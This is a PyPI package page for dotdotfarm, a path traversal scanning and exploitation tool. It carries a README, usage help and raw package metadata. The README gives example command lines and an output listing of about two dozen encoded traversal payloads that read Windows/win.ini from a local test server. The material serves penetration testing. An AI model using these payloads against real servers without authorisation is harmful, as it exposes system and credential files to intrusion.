dotdotfarm


Namedotdotfarm JSON
Version 1.7.2 PyPI version JSON
download
home_pageNone
SummaryFast Path Traversal exploitation tool
upload_time2024-04-19 18:18:40
maintainerNone
docs_urlNone
authortreddis
requires_pythonNone
licenseGPLv3 license
keywords path-traversal fuzzer appsec lfi security web pentesting
VCS
bugtrack_url
requirements aiohttp aiohttp-socks aiosignal async-timeout attrs blinker click colorama flask frozenlist idna itsdangerous jinja2 markupsafe multidict python-socks tqdm websockets werkzeug yarl
Travis-CI No Travis.
coveralls test coverage No coveralls.
            dotdotfarm
==========

![Version](https://img.shields.io/badge/version-1.7.2-blue?style=for-the-badge)

Utility for detection & exploitation of Path Traversal vulnerabilities in various network services

dotdotweb - PT tool for HTTP services


Tools are written in Python with using asyncio requests (aiohttp) with some acceleration techniques, which allows you to make up to ~3K requests per second

Features
--------
- using asynchronous requests for increasing scan of target
- ability to fetch files' content after succeeding a payload
- specifying payload in any part of query (URL, headers or POST data)
- using callbacks for handling of results

Installation
============
Install from PyPi
```bash
pip install dotdotfarm
```
You can also install it directly from GitHub repository
```bash
git clone https://github.com/treddis/dotdotfarm.git
cd dotdotfarm
pip3 install .
```
To upgrade tool run
```bash
pip install --upgrade dotdotfarm
```

Usage
=====
```text

    .___      __      .___      __    _____                      
  __| _/_____/  |_  __| _/_____/  |__/ ____\____ _______  _____  
 / __ |/  _ \   __\/ __ |/  _ \   __\   __\\__  \\_  __ \/     \ 
/ /_/ (  <_> )  | / /_/ (  <_> )  |  |  |   / __ \|  | \/  Y Y  \
\____ |\____/|__| \____ |\____/|__|  |__|  (____  /__|  |__|_|  /
     \/                \/                       \/            \/ 
     
usage: dotdotweb [-h] [--version] [-V] [-A] [-R] [-o {windows,linux}]
                 [-d DEPTH] [-f FILE] [--delay DELAY]
                 [-t TIMEOUT] [-fs FS] [-fc FC] [--header HEADERS] [--data DATA]
                 url

fast path traversal identificator & exploit

positional arguments:
  url                   target URL

options:
  -h, --help            show this help message and exit
  --version             print version of the tool
  -V, --validate        validate files' content after successfull exploitation
                            (default false)
  -A, --all             try all files after successfull exploitation
                            (default false)
  -R, --print-files     read traversed files (default false)
  -o {windows,linux}, --os-type {windows,linux}
                        target OS type (default all)
  -d DEPTH, --depth DEPTH
                        depth of PT searching (default 5)
  -f FILE, --file FILE  specific file for PT detection
  --delay DELAY         make delays between requests in milliseconds (default 0)
  -t TIMEOUT, --timeout TIMEOUT
                        timeout of connections (default 60)
  -fs FS                filter output by size
  -fc FC                filter output by response code
  --header HEADERS      custom header for requests
  --data DATA           specify POST data
```

### Passing payload in GET parameters
Passing brute parameters via `?par=val` pairs:
```text
dotdotweb -o windows -fc 500 \ 
          http://someserver.com:1280/newpath?testparameter=FUZZ&secondparameter=somevalue
```

### Passing payload in headers
Passing brute parameters via `Origin: master=FUZZ` pairs:
```text
dotdotweb -o linux -fc 500,404 -H "Referer: https://www.google.com/path?q=FUZZ" \
          http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue
```

### Passing payload in POST data
Passing brute parameters via POST data parameters
```text
dotdotweb -o linux -fc 500 -fs 111 -d "key0=val0&key1=val1" \
          http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue
```

### Using regexp to filter responses
Pass -fs (filter by size) or -fc (filter by status code) to filter out not related responses
```text
dotdotweb -fc 50*,4* -fs 18??,1834* http://someserver.com:1234/testpath/FUZZ
```

### Launch callbacks on responses
You can launch callbacks on your responses to perform some check or make other actions.
In the box implemented callbacks:
- validate response content using regexp and print then (-V). You can pass your regexp too!
- try all payloads even entry point is found (-A)
- read traversed files content and print them on screen (-P)

Example output
==============
```text
dotdotweb -o windows "http://localhost:8080/pathtrav?query=FUZZ" 

    .___      __      .___      __    _____
  __| _/_____/  |_  __| _/_____/  |__/ ____\____ _______  _____
 / __ |/  _ \   __\/ __ |/  _ \   __\   __\\__  \\_  __ \/     \
/ /_/ (  <_> )  | / /_/ (  <_> )  |  |  |   / __ \|  | \/  Y Y  \
\____ |\____/|__| \____ |\____/|__|  |__|  (____  /__|  |__|_|  /
     \/                \/                       \/            \/

[*] Started at Sun Jan 22 19:32:46 2023
 ../../../Windows/win.ini                                                   [Status: 200, Size: 111]
 ../Windows/win.ini                                                         [Status: 200, Size: 111]
 ..\Windows\win.ini                                                         [Status: 200, Size: 111]
 ..%2fWindows%2fwin.ini                                                     [Status: 200, Size: 111]
 ..\..\..\Windows\win.ini                                                   [Status: 200, Size: 111]
 ..%5c..%5c..%5cWindows%5cwin.ini                                           [Status: 200, Size: 111]
 ..%5cWindows%5cwin.ini                                                     [Status: 200, Size: 111]
 .%2e/Windows/win.ini                                                       [Status: 200, Size: 111]
 .%2e\Windows\win.ini                                                       [Status: 200, Size: 111]
 .%2e%2fWindows%2fwin.ini                                                   [Status: 200, Size: 111]
 .%2e%5cWindows%5cwin.ini                                                   [Status: 200, Size: 111]
 %5C..%5cWindows%5cwin.ini                                                  [Status: 200, Size: 111]
 f%5C..%2fWindows%2fwin.ini                                                 [Status: 200, Size: 111]
 %5C../Windows/win.ini                                                      [Status: 200, Size: 111]
 %5C..\%5C..\%5C..\Windows\win.ini                                          [Status: 200, Size: 111]
 .%2e\.%2e\.%2e\Windows\win.ini                                             [Status: 200, Size: 111]
 .%2e%5c.%2e%5c.%2e%5cWindows%5cwin.ini                                     [Status: 200, Size: 111]
 %5C..%2f%5C..%2f%5C..%2fWindows%2fwin.ini                                  [Status: 200, Size: 111]
 %5C../%5C../%5C../Windows/win.ini                                          [Status: 200, Size: 111]
 %5C..%5c%5C..%5c%5C..%5cWindows%5cwin.ini                                  [Status: 200, Size: 111]
 %2e./Windows/win.ini                                                       [Status: 200, Size: 111]
 %2e./%2e./%2e./Windows/win.ini                                             [Status: 200, Size: 111]
 %2e.%5cWindows%5cwin.ini                                                   [Status: 200, Size: 111]
 %2e.%5c%2e.%5c%2e.%5cWindows%5cwin.ini                                     [Status: 200, Size: 111]
 .%2e%2f.%2e%2f.%2e%2fWindows%2fwin.ini                                     [Status: 200, Size: 111]
100%|██████████████████████████████████████████████████████████| 6960/6960 [00:12<00:00, 575.63it/s]
[*] Ended at Sun Jan 22 19:32:58 2023 (11 seconds)
```

            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "dotdotfarm",
    "maintainer": null,
    "docs_url": null,
    "requires_python": null,
    "maintainer_email": null,
    "keywords": "path-traversal, fuzzer, appsec, lfi, security, web, pentesting",
    "author": "treddis",
    "author_email": null,
    "download_url": "https://files.pythonhosted.org/packages/28/8e/98841b3151fa428e74882035af1f6c979e522bd219b4ca768d45e4555fc2/dotdotfarm-1.7.2.tar.gz",
    "platform": null,
    "description": "dotdotfarm\r\n==========\r\n\r\n![Version](https://img.shields.io/badge/version-1.7.2-blue?style=for-the-badge)\r\n\r\nUtility for detection & exploitation of Path Traversal vulnerabilities in various network services\r\n\r\ndotdotweb - PT tool for HTTP services\r\n\r\n\r\nTools are written in Python with using asyncio requests (aiohttp) with some acceleration techniques, which allows you to make up to ~3K requests per second\r\n\r\nFeatures\r\n--------\r\n- using asynchronous requests for increasing scan of target\r\n- ability to fetch files' content after succeeding a payload\r\n- specifying payload in any part of query (URL, headers or POST data)\r\n- using callbacks for handling of results\r\n\r\nInstallation\r\n============\r\nInstall from PyPi\r\n```bash\r\npip install dotdotfarm\r\n```\r\nYou can also install it directly from GitHub repository\r\n```bash\r\ngit clone https://github.com/treddis/dotdotfarm.git\r\ncd dotdotfarm\r\npip3 install .\r\n```\r\nTo upgrade tool run\r\n```bash\r\npip install --upgrade dotdotfarm\r\n```\r\n\r\nUsage\r\n=====\r\n```text\r\n\r\n    .___      __      .___      __    _____                      \r\n  __| _/_____/  |_  __| _/_____/  |__/ ____\\____ _______  _____  \r\n / __ |/  _ \\   __\\/ __ |/  _ \\   __\\   __\\\\__  \\\\_  __ \\/     \\ \r\n/ /_/ (  <_> )  | / /_/ (  <_> )  |  |  |   / __ \\|  | \\/  Y Y  \\\r\n\\____ |\\____/|__| \\____ |\\____/|__|  |__|  (____  /__|  |__|_|  /\r\n     \\/                \\/                       \\/            \\/ \r\n     \r\nusage: dotdotweb [-h] [--version] [-V] [-A] [-R] [-o {windows,linux}]\r\n                 [-d DEPTH] [-f FILE] [--delay DELAY]\r\n                 [-t TIMEOUT] [-fs FS] [-fc FC] [--header HEADERS] [--data DATA]\r\n                 url\r\n\r\nfast path traversal identificator & exploit\r\n\r\npositional arguments:\r\n  url                   target URL\r\n\r\noptions:\r\n  -h, --help            show this help message and exit\r\n  --version             print version of the tool\r\n  -V, --validate        validate files' content after successfull exploitation\r\n                            (default false)\r\n  -A, --all             try all files after successfull exploitation\r\n                            (default false)\r\n  -R, --print-files     read traversed files (default false)\r\n  -o {windows,linux}, --os-type {windows,linux}\r\n                        target OS type (default all)\r\n  -d DEPTH, --depth DEPTH\r\n                        depth of PT searching (default 5)\r\n  -f FILE, --file FILE  specific file for PT detection\r\n  --delay DELAY         make delays between requests in milliseconds (default 0)\r\n  -t TIMEOUT, --timeout TIMEOUT\r\n                        timeout of connections (default 60)\r\n  -fs FS                filter output by size\r\n  -fc FC                filter output by response code\r\n  --header HEADERS      custom header for requests\r\n  --data DATA           specify POST data\r\n```\r\n\r\n### Passing payload in GET parameters\r\nPassing brute parameters via `?par=val` pairs:\r\n```text\r\ndotdotweb -o windows -fc 500 \\ \r\n          http://someserver.com:1280/newpath?testparameter=FUZZ&secondparameter=somevalue\r\n```\r\n\r\n### Passing payload in headers\r\nPassing brute parameters via `Origin: master=FUZZ` pairs:\r\n```text\r\ndotdotweb -o linux -fc 500,404 -H \"Referer: https://www.google.com/path?q=FUZZ\" \\\r\n          http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue\r\n```\r\n\r\n### Passing payload in POST data\r\nPassing brute parameters via POST data parameters\r\n```text\r\ndotdotweb -o linux -fc 500 -fs 111 -d \"key0=val0&key1=val1\" \\\r\n          http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue\r\n```\r\n\r\n### Using regexp to filter responses\r\nPass -fs (filter by size) or -fc (filter by status code) to filter out not related responses\r\n```text\r\ndotdotweb -fc 50*,4* -fs 18??,1834* http://someserver.com:1234/testpath/FUZZ\r\n```\r\n\r\n### Launch callbacks on responses\r\nYou can launch callbacks on your responses to perform some check or make other actions.\r\nIn the box implemented callbacks:\r\n- validate response content using regexp and print then (-V). You can pass your regexp too!\r\n- try all payloads even entry point is found (-A)\r\n- read traversed files content and print them on screen (-P)\r\n\r\nExample output\r\n==============\r\n```text\r\ndotdotweb -o windows \"http://localhost:8080/pathtrav?query=FUZZ\" \r\n\r\n    .___      __      .___      __    _____\r\n  __| _/_____/  |_  __| _/_____/  |__/ ____\\____ _______  _____\r\n / __ |/  _ \\   __\\/ __ |/  _ \\   __\\   __\\\\__  \\\\_  __ \\/     \\\r\n/ /_/ (  <_> )  | / /_/ (  <_> )  |  |  |   / __ \\|  | \\/  Y Y  \\\r\n\\____ |\\____/|__| \\____ |\\____/|__|  |__|  (____  /__|  |__|_|  /\r\n     \\/                \\/                       \\/            \\/\r\n\r\n[*] Started at Sun Jan 22 19:32:46 2023\r\n ../../../Windows/win.ini                                                   [Status: 200, Size: 111]\r\n ../Windows/win.ini                                                         [Status: 200, Size: 111]\r\n ..\\Windows\\win.ini                                                         [Status: 200, Size: 111]\r\n ..%2fWindows%2fwin.ini                                                     [Status: 200, Size: 111]\r\n ..\\..\\..\\Windows\\win.ini                                                   [Status: 200, Size: 111]\r\n ..%5c..%5c..%5cWindows%5cwin.ini                                           [Status: 200, Size: 111]\r\n ..%5cWindows%5cwin.ini                                                     [Status: 200, Size: 111]\r\n .%2e/Windows/win.ini                                                       [Status: 200, Size: 111]\r\n .%2e\\Windows\\win.ini                                                       [Status: 200, Size: 111]\r\n .%2e%2fWindows%2fwin.ini                                                   [Status: 200, Size: 111]\r\n .%2e%5cWindows%5cwin.ini                                                   [Status: 200, Size: 111]\r\n %5C..%5cWindows%5cwin.ini                                                  [Status: 200, Size: 111]\r\n f%5C..%2fWindows%2fwin.ini                                                 [Status: 200, Size: 111]\r\n %5C../Windows/win.ini                                                      [Status: 200, Size: 111]\r\n %5C..\\%5C..\\%5C..\\Windows\\win.ini                                          [Status: 200, Size: 111]\r\n .%2e\\.%2e\\.%2e\\Windows\\win.ini                                             [Status: 200, Size: 111]\r\n .%2e%5c.%2e%5c.%2e%5cWindows%5cwin.ini                                     [Status: 200, Size: 111]\r\n %5C..%2f%5C..%2f%5C..%2fWindows%2fwin.ini                                  [Status: 200, Size: 111]\r\n %5C../%5C../%5C../Windows/win.ini                                          [Status: 200, Size: 111]\r\n %5C..%5c%5C..%5c%5C..%5cWindows%5cwin.ini                                  [Status: 200, Size: 111]\r\n %2e./Windows/win.ini                                                       [Status: 200, Size: 111]\r\n %2e./%2e./%2e./Windows/win.ini                                             [Status: 200, Size: 111]\r\n %2e.%5cWindows%5cwin.ini                                                   [Status: 200, Size: 111]\r\n %2e.%5c%2e.%5c%2e.%5cWindows%5cwin.ini                                     [Status: 200, Size: 111]\r\n .%2e%2f.%2e%2f.%2e%2fWindows%2fwin.ini                                     [Status: 200, Size: 111]\r\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 6960/6960 [00:12<00:00, 575.63it/s]\r\n[*] Ended at Sun Jan 22 19:32:58 2023 (11 seconds)\r\n```\r\n",
    "bugtrack_url": null,
    "license": "GPLv3 license",
    "summary": "Fast Path Traversal exploitation tool",
    "version": "1.7.2",
    "project_urls": {
        "Changelog": "https://github.com/treddis/dotdotfarm/blob/master/CHANGELOG.md",
        "Homepage": "https://github.com/treddis/dotdotfarm",
        "Repository": "https://github.com/treddis/dotdotfarm.git"
    },
    "split_keywords": [
        "path-traversal",
        " fuzzer",
        " appsec",
        " lfi",
        " security",
        " web",
        " pentesting"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "288e98841b3151fa428e74882035af1f6c979e522bd219b4ca768d45e4555fc2",
                "md5": "48804b952432e78622ee0bd43754eaef",
                "sha256": "f60742053319c25aa083b67e917f801e76a263de4eaada05fa49b6825dcdab01"
            },
            "downloads": -1,
            "filename": "dotdotfarm-1.7.2.tar.gz",
            "has_sig": false,
            "md5_digest": "48804b952432e78622ee0bd43754eaef",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 25827,
            "upload_time": "2024-04-19T18:18:40",
            "upload_time_iso_8601": "2024-04-19T18:18:40.560735Z",
            "url": "https://files.pythonhosted.org/packages/28/8e/98841b3151fa428e74882035af1f6c979e522bd219b4ca768d45e4555fc2/dotdotfarm-1.7.2.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-04-19 18:18:40",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "treddis",
    "github_project": "dotdotfarm",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "requirements": [
        {
            "name": "aiohttp",
            "specs": [
                [
                    "==",
                    "3.9.5"
                ]
            ]
        },
        {
            "name": "aiohttp-socks",
            "specs": [
                [
                    "==",
                    "0.8.4"
                ]
            ]
        },
        {
            "name": "aiosignal",
            "specs": [
                [
                    "==",
                    "1.3.1"
                ]
            ]
        },
        {
            "name": "async-timeout",
            "specs": [
                [
                    "==",
                    "4.0.3"
                ]
            ]
        },
        {
            "name": "attrs",
            "specs": [
                [
                    "==",
                    "23.2.0"
                ]
            ]
        },
        {
            "name": "blinker",
            "specs": [
                [
                    "==",
                    "1.7.0"
                ]
            ]
        },
        {
            "name": "click",
            "specs": [
                [
                    "==",
                    "8.1.7"
                ]
            ]
        },
        {
            "name": "colorama",
            "specs": [
                [
                    "==",
                    "0.4.6"
                ]
            ]
        },
        {
            "name": "flask",
            "specs": [
                [
                    "==",
                    "3.0.3"
                ]
            ]
        },
        {
            "name": "frozenlist",
            "specs": [
                [
                    "==",
                    "1.4.1"
                ]
            ]
        },
        {
            "name": "idna",
            "specs": [
                [
                    "==",
                    "3.7"
                ]
            ]
        },
        {
            "name": "itsdangerous",
            "specs": [
                [
                    "==",
                    "2.2.0"
                ]
            ]
        },
        {
            "name": "jinja2",
            "specs": [
                [
                    "==",
                    "3.1.3"
                ]
            ]
        },
        {
            "name": "markupsafe",
            "specs": [
                [
                    "==",
                    "2.1.5"
                ]
            ]
        },
        {
            "name": "multidict",
            "specs": [
                [
                    "==",
                    "6.0.5"
                ]
            ]
        },
        {
            "name": "python-socks",
            "specs": [
                [
                    "==",
                    "2.4.4"
                ]
            ]
        },
        {
            "name": "tqdm",
            "specs": [
                [
                    "==",
                    "4.64.1"
                ]
            ]
        },
        {
            "name": "websockets",
            "specs": [
                [
                    "==",
                    "12.0"
                ]
            ]
        },
        {
            "name": "werkzeug",
            "specs": [
                [
                    "==",
                    "3.0.2"
                ]
            ]
        },
        {
            "name": "yarl",
            "specs": [
                [
                    "==",
                    "1.9.4"
                ]
            ]
        }
    ],
    "lcname": "dotdotfarm"
}
        
Elapsed time: 0.23057s